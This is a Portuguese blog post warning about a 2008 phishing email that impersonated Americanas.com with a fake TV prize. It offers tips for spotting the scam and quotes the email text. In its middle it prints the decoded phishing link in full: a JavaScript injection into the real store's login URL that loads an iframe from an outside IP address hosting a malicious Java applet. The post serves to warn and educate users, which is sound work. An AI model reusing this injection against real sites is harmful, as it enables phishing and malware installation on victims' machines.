Entre os vários tipos de Phishing Scam que existem, os que dão mais resultado são os que oferecem algum prêmio. O fato de oferecer algo caro e que seja um sonho de consumo da pessoa, um carro, celular, computador, TV de Plasma, o que seja, faz com que o destinatário fique cego e não perceba os truques presentes.
Esse Scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:
- Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
- Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
- Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:
http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML='<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>
- Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.
Mensagem original (screenshot)
Tela que simula o site Americanas.com (screenshot)
Mensagem original (texto)
Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG
Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço
ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.
Sempre confira se o link é para o site verdadeiro da Americanas.com
Nunca informe sua senha para terceiros.
Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.
Mensagem recebida por e-mail em 16/04/2008
wpDiscuz